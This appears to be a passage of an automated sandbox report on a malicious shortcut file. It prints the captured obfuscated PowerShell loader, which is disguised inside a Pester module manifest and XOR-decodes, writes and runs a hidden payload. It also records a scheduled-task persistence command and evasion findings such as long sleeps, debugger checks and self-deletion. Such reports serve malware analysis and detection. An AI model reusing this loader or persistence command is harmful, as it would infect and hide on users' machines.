export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: c:\users\user\desktop\knfv5ivjev.lnk

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3969	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4086	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1522

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	API coverage: 8.4 %
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	API coverage: 8.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep count: 3969 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep count: 4086 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep count: 5279 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep count: 1522 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep time: -2767011611056431s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: GSlLzFnTov.exe, 0000000E.00000003.1503111107.0000022C409E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DEB8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00007FF7F1DEB8E4

Contains functionality to dynamically determine API calls

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,

8_2_00007FF7F1DB1D84

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DEBA8C SetUnhandledExceptionFilter,	8_2_00007FF7F1DEBA8C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DEB8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF7F1DEB8E4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DEAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF7F1DEAFA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9BA8C SetUnhandledExceptionFilter,	12_2_00007FF700E9BA8C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00007FF700E9AFA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9B8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00007FF700E9B8E4

Creates a process in suspended mode (likely to inject code)

